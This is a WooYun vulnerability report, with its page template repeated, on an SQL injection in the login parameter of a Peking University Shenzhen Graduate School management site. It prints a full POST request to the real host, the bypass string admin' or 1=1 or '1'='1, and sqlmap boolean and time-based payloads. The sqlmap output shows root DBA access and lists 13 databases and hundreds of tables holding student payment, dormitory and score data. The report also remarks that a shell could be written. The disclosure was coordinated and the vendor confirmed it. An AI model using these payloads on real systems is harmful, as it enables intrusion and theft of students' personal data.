北京大学深圳研究生院某站SQL注入(DBA权限)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158074

漏洞标题：北京大学深圳研究生院某站SQL注入(DBA权限)

漏洞作者：路人甲

提交时间：2015-12-04 12:03

修复时间：2016-01-18 12:20

公开时间：2016-01-18 12:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-04：细节已通知厂商并且等待厂商处理中
2015-12-04：厂商已经确认，细节仅向厂商公开
2015-12-14：细节向核心白帽子及相关领域专家公开
2015-12-24：细节向普通白帽子公开
2016-01-03：细节向实习白帽子公开
2016-01-18：细节向公众公开

简要描述：

详细说明：

信息量挺大的

http://ss.pkusz.edu.cn/ 北京大学深圳研究生院信息管理平台

POST /session HTTP/1.1
Content-Length: 258
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://ss.pkusz.edu.cn
Cookie: _fullcalendar_session=BAh7CDoQX2NzcmZfdG9rZW4iMWdlZFdjMWxHNTVIaTAvVGdBK2VKV1hOTUQ0UGlyYURoU0dremZTUE90S0E9Og9zZXNzaW9uX2lkIiVmMGU5NzY5ZjMyNTU2ZjQzZDYzZjdlMDQyOTI0ZDkwYSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiAAY6CkB1c2VkewY7CEY%3D--3f770cdecb7e412a71d3109111cb0f5579c54b03
Host: ss.pkusz.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
authenticity_token=gedWc1lG55Hi0/TgA%2beJWXNMD4PiraDhSGkzfSPOtKA%3d&image=xCDC&login=*&password=g00dPa%24%24w0rD&yanzhengma=1

login参数存在注入
发现这个就尝试了一下万能密码...
admin' or 1=1 or '1'='1
密码随便填就这么进去了...

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: authenticity_token=gedWc1lG55Hi0/TgA+eJWXNMD4PiraDhSGkzfSPOtKA=&image=xCDC&login=-7215') OR 8985=8985 AND ('arKE'='arKE&password=g00dPa$$w0rD&yanzhengma=1
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: authenticity_token=gedWc1lG55Hi0/TgA+eJWXNMD4PiraDhSGkzfSPOtKA=&image=xCDC&login=') AND (SELECT * FROM (SELECT(SLEEP(5)))tofu) AND ('OXFj'='OXFj&password=g00dPa$$w0rD&yanzhengma=1
---
web server operating system: Linux Ubuntu 11.04 (Natty Narwhal)
web application technology: Apache 2.2.17
back-end DBMS: MySQL 5.0.12
current user:    'root@localhost'
current database:    'fullcalendarbranch'
current user is DBA:    True
available databases [13]:
[*] atutor
[*] canvas_development
[*] canvas_production
[*] canvas_queue_development
[*] canvas_queue_production
[*] crmfullcalendar
[*] emailer
[*] fullcalendarbranch
[*] fullcalendarbranch_test
[*] information_schema
[*] moodle
[*] mysql
[*] tourism

Database: fullcalendarbranch
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| evaluation_students_answers      | 940161  |
| courses_stu_reg_infs             | 70468   |
| events                           | 27150   |
| course_act_logs                  | 23556   |
| student_registers                | 18971   |
| stu_payments                     | 18535   |
| register_infos                   | 13686   |
| tuitions                         | 12005   |
| oce_scores                       | 11545   |
| self_words_answers               | 7653    |
| stu_reg_infs                     | 7559    |
| stu_work_infs                    | 7537    |
| stu_bedrooms                     | 7137    |
| water_payments                   | 7099    |
| scbb_infos                       | 7040    |
| users                            | 6587    |
| temp_fees                        | 5685    |
| stu_bedroom_xuanfangs            | 5503    |
| reports                          | 5218    |
| rcrm_accounts_contacts           | 5191    |
| referrals                        | 4223    |
| rcrm_accounts                    | 4139    |
| verifies                         | 3748    |
| areas                            | 3525    |
| student_fees                     | 3073    |
| scholarships                     | 2590    |
| education_histories              | 2373    |
| news_checks_rcrm_leads           | 2322    |
| oce_tuitions                     | 2241    |
| colleges                         | 2223    |
| homeworks_students               | 2157    |
| oce_infos                        | 2130    |
| lead_users                       | 1962    |
| course_cmodules                  | 1806    |
| sam_events                       | 1782    |
| internships                      | 1776    |
| courses                          | 1631    |
| event_series                     | 1616    |
| bedrooms_standard_payments       | 1552    |
| bedroom_xuanfangs                | 1479    |
| worker_payments                  | 1427    |
| logs                             | 1262    |
| bedrooms                         | 1242    |
| rcrm_leads                       | 1189    |
| evaluation_paper_course_cmodules | 1175    |
| stu_reg_inf_tmodule_teachers     | 1162    |
| work_records                     | 1124    |
| university_courses               | 1078    |
| class_cmodules                   | 1020    |
| worker_infs                      | 990     |
| update_files                     | 962     |
| phbs_edpstudents                 | 917     |
| lead_users_rcrm_batches          | 863     |
| exc_answers                      | 833     |
| event_retunes                    | 702     |
| temp_fee_stls                    | 669     |
| loan_datas                       | 644     |
| teachers                         | 634     |
| event_series_staffs              | 570     |
| stu_apply_prizes                 | 567     |
| exc_scores                       | 564     |
| rcrm_meetings_leads              | 544     |
| courses_teachers                 | 461     |
| stu_reg_infs_teams               | 420     |
| roles_users                      | 405     |
| staffs                           | 405     |
| docus                            | 403     |
| oce_tk_scores                    | 399     |
| change_bedrooms                  | 388     |
| cities                           | 377     |
| train_plans                      | 363     |
| permissions_roles                | 361     |
| rcrm_accounts_bugs               | 357     |
| classroom_users                  | 336     |
| phbs_edpstudent_pays             | 334     |
| course_times                     | 293     |
| stu_tmodule_teacher_reals        | 287     |
| apply_excels                     | 278     |
| rcrm_campaign_logs               | 269     |
| loans                            | 268     |
| countries                        | 240     |
| oce_uploadfiles                  | 240     |
| contries                         | 239     |
| apply_awards                     | 217     |
| bnews_checks_rcrm_leads          | 200     |
| cnews_checks_rcrm_leads          | 200     |
| dnews_checks_rcrm_leads          | 200     |
| anews_checks_rcrm_leads          | 199     |
| enews_checks_rcrm_leads          | 199     |
| evaluation_questions             | 182     |
| exc_batch_stus                   | 180     |
| tmodule_teachers                 | 156     |
| permissions                      | 145     |
| anews_checks                     | 134     |
| bnews_checks                     | 134     |
| cnews_checks                     | 134     |
| dnews_checks                     | 134     |
| enews_checks                     | 134     |
| news_checks                      | 134     |
| cmodules                         | 132     |
| classrooms                       | 129     |
| oce_major_courses                | 119     |
| temp_qianfeis                    | 114     |
| staff_bedrooms                   | 112     |
| rcrm_leads_trades                | 106     |
| homeworks                        | 101     |
| exc_batch_schools                | 98      |
| student_classes                  | 96      |
| quales_rcrm_leads                | 93      |
| award_assigns                    | 92      |
| tuition_standards                | 86      |
| floors                           | 79      |
| messages                         | 72      |
| phbs_pcourses                    | 72      |
| schema_migrations                | 70      |
| facebooks                        | 69      |
| exc_schools                      | 65      |
| step_change_bedrooms             | 60      |
| class_teachers                   | 58      |
| nations                          | 58      |
| oce_courses                      | 55      |
| apply_exgraduates                | 53      |
| rcrm_status                      | 47      |
| evaluation_question_types        | 42      |
| phbs_contract_pays               | 36      |
| trades                           | 35      |
| provinces                        | 34      |
| services                         | 34      |
| roles                            | 33      |
| interns                          | 32      |
| courses_student_classes          | 30      |
| standard_payments                | 30      |
| majors                           | 29      |
| rmodules                         | 29      |
| phbs_contracts                   | 25      |
| sam_teams                        | 24      |
| depts_users                      | 23      |
| exc_batch_teachers               | 21      |
| lead_user_infos                  | 21      |
| npositions                       | 21      |
| stu_sources                      | 21      |
| evaluation_answers               | 16      |
| phbs_companies                   | 16      |
| event_categories                 | 15      |
| mbatrades                        | 15      |
| sam_instruments                  | 15      |
| socials                          | 14      |
| course_covers                    | 13      |
| universities                     | 13      |
| choose_bedroom_times             | 12      |
| enterprises                      | 12      |
| rcrm_meetings                    | 12      |
| award_standards                  | 11      |
| depts                            | 11      |
| facebooks_copy                   | 11      |
| info_ways                        | 10      |
| phbs_edpdepts                    | 10      |
| techangs                         | 10      |
| evaluation_papers                | 9       |
| locations                        | 9       |
| rcrm_meetings_users              | 9       |
| evaluates                        | 8       |
| exc_questions                    | 8       |
| self_words                       | 8       |
| stucourses                       | 8       |
| notice_types                     | 7       |
| notices                          | 7       |
| quales                           | 7       |
| register_terms                   | 7       |
| sm_moduls                        | 7       |
| specialties                      | 7       |
| wagecategories                   | 7       |
| course_objects                   | 6       |
| rcrm_batches                     | 6       |
| remarks                          | 6       |
| studystatus                      | 6       |
| buildings                        | 5       |
| mbaquales                        | 5       |
| oce_majors                       | 5       |
| tc_levels                        | 5       |
| teams                            | 5       |
| tmodules                         | 5       |
| user_infos                       | 5       |
| evaluation_answer_types          | 4       |
| mentor_students                  | 4       |
| phbs_activity_teachers           | 4       |
| phbs_service_types               | 4       |
| projects_staffs                  | 4       |
| invoice_nos                      | 3       |
| news_types                       | 3       |
| phbs_activities                  | 3       |
| phbs_service_type_teachers       | 3       |
| registstatus                     | 3       |
| stu_informations                 | 3       |
| styles                           | 3       |
| class_tmodules                   | 2       |
| event_series_teachers            | 2       |
| exams_students                   | 2       |
| exc_batches                      | 2       |
| fires                            | 2       |
| projects                         | 2       |
| exams                            | 1       |
| excels                           | 1       |
| mentors                          | 1       |
| oce_configs                      | 1       |
| statues                          | 1       |
+----------------------------------+---------+

漏洞证明：

修复方案：

加上是DBA权限，写shell就不好了.求高rank。。。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-12-04 12:15

厂商回复：

非常感谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158074

漏洞标题：北京大学深圳研究生院某站SQL注入(DBA权限)

相关厂商：北京大学深圳研究生院

漏洞作者：路人甲

提交时间：2015-12-04 12:03

修复时间：2016-01-18 12:20

公开时间：2016-01-18 12:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158074

漏洞标题：北京大学深圳研究生院某站SQL注入(DBA权限)

相关厂商：北京大学深圳研究生院

漏洞作者： 路人甲

提交时间：2015-12-04 12:03

修复时间：2016-01-18 12:20

公开时间：2016-01-18 12:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0158074"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云